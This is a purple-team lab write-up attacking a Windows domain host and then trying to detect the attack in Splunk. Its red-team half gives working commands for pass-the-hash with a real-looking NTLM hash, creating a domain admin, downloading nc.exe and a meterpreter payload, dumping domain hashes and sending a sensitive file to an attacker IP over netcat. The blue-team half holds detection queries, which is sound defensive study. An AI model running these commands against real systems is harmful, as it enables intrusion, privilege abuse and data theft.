Purple Team Exercise: Professor

Since we don’t know the password, we’ll have to use the wordlist provided in the /root directory of Kif.

Red Team

nmap 192.168.0.254

nmap -sV -O -p 53,88,135,139,389,445,8089 192.168.0.254 –script=safe -oA nmap

msfconsole
search smb_login
use auxilary/scanner/smb/smb_login

show options
set smbuser Administrator
set smbpass :aad3b435b51404eeaad3b435b51404ee:a6d00d6c85d3a477921688771dba6eaf
set rhosts 192.168.0.251-254
exploit

This only worked when Kali was local to the machine, not over VPN. Not sure why…
use exploit/windows/smb/psexec
Enter same info to get system shell

Because of VPN we need to issue:

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:a6d00d6c85d3a477921688771dba6eaf //192.168.0.254 cmd.exe

net user sqearl Password1 /ADD /DOMAIN
net group “Domain Admins” sqearl /ADD /DOMAIN

A coworker mentioned I could add sqearl to Enterprise Admin’s and would have the domain permissions necessary to later run the meterpreter post script. Thanks Ed!

IEX(new-object System.Net.WebClient).DownloadFile(‘http://10.242.2.2:8000/nc.exe’,’C:\Users\sqearl\Desktop\nc.exe’)
Wireshark/ pcap did not pick this nc.exe example up over powershell

Windows, change to cmd: nc.exe -l -p 1234 > met64.exe
Kali: nc -w 3 192.168.0.254 1234 < met64.exe
use exploit/multi/handler
run
met64.exe
getuid

Exit this session, then execute met64.exe from the pth-winexe session:

Migrate to x64 system process

Ctrl+Z = background meterpreter session
use post/windows/gather/credentials/domain_hashdump
set sessions 4
run

cd C:\Users\Administrator\Desktop
type sensitive_info

Kali:
nc -l -p 2345 > sensitive_info.txt (we need to disable FW for this to work as well)

Windows:
C:\Users\sqearl\Desktop\nc.exe -w 3 10.242.2.2 2345 < sensitive_info.txt

Blue Team

Filter by Professors IP:

Splunk search for snort SCAN alerts

earliest=05/13/2018:16:00:0 latest=05/13/2018:18:25:0 src_ip=”10.242.2.2″ dest_ip=”192.168.0.254″ sourcetype=sguild name=*SCAN* name!=*Dirbuster* name!=*Nikto* | sort 0 _time |table _time src_ip dest_ip name

SMB Alerts during our smb_login attempts

I used this article, but I wasn’t able to log my pass the hash attacks. I must need to look again:
https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis

Here’s the search that “should” detect PTH:
sourcetype=* Logon_Type=3 EventCode=4624 Logon_Process=NtLmSsp Security_ID=”NULL SID” sourcetype=”WinEventLog:Security” Key_Length=0 Account_Name!=”$*” AND Account_Name!=”-” AND Account_Name!=”ANONYMOUS LOGON”

We use process command line to detect the admin’s commands:

host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!=”*xff*” | table _time Account_Name Process_Command_Line status | sort + _time

Splunk Alert:
We should be alerting or at least reporting on these commands. If a domain user is added, maybe an alert.
host=professor Process_Command_Line=”/ADD /DOMAIN”

OSSEC typically alerts on newly created users, and first time logins… For some reason, I don’t see these alerts.

netcat connecting to our Kali IP:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!=”*xff*” | table _time Account_Name Process_Command_Line status | sort + _time

We do not have any insight into the meterpreter commands:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!=”*xff*” | table _time Account_Name Process_Command_Line status | sort + _time

We aren’t able to intercept this file because it was sent via netcat

I should have logs for this command, but everything run prior to this in meterpreter goes undetected 🙁